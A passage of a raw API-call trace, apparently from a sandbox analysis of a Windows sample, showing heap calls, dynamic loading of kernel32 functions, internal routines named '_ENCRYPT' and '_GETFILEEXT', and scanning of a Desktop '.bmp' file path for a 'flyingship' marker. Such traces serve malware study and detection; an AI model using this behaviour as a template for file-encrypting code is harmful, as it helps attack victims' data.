(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.671] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.671] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0164.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba018, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0164.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.672] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0164.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0164.672] CloseHandle (hObject=0x138) returned 1 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.673] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0164.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.674] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0164.674] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.674] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0164.674] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.674] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0164.674] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0164.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.675] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.675] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0xb6fce980, ftLastWriteTime.dwHighDateTime=0x1d5ddcd, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 0x90add8 [0164.677] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0xb6fce980, ftLastWriteTime.dwHighDateTime=0x1d5ddcd, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 0x90add8 [0164.677] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NA3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pEcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EcvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvaltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="valtBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="altBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tBR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BR8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW 